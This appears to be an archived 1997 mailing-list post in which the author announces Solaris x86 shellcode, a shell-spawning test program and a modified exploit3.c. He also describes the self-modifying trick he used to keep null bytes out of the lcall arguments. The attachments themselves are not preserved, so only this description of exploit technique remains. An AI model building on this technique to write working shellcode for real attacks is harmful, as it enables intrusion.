Solaris x86 buffer overflows

jim bresler (jfb11@MICRO-NET.COM)
Thu, 12 Jun 1997 08:49:26 -0400


Hi, attached is the "shellcode" for Solaris x86 I wrote yesterday.
This includes the code I assembled (it will core dump when run directly,
because it is self-modifying), a test program that should spawn a shell,
and a modified version of Aleph One's exploit3.c.

Note that most buffer overflows are self-modifying in one part;
this one changes itself in two parts. Because a long call is used and
registers cannot be used as arguments, the arguments to the lcall should
be ignored. To avoid the need to leave a null character in at run time,
the arguments are changed at run time.

Jim <jfb11@micro-net.com>

[Attachments (base64 bodies not preserved in this archive): solarisx86_shellcode.s, test_sc.c, exploit3.c]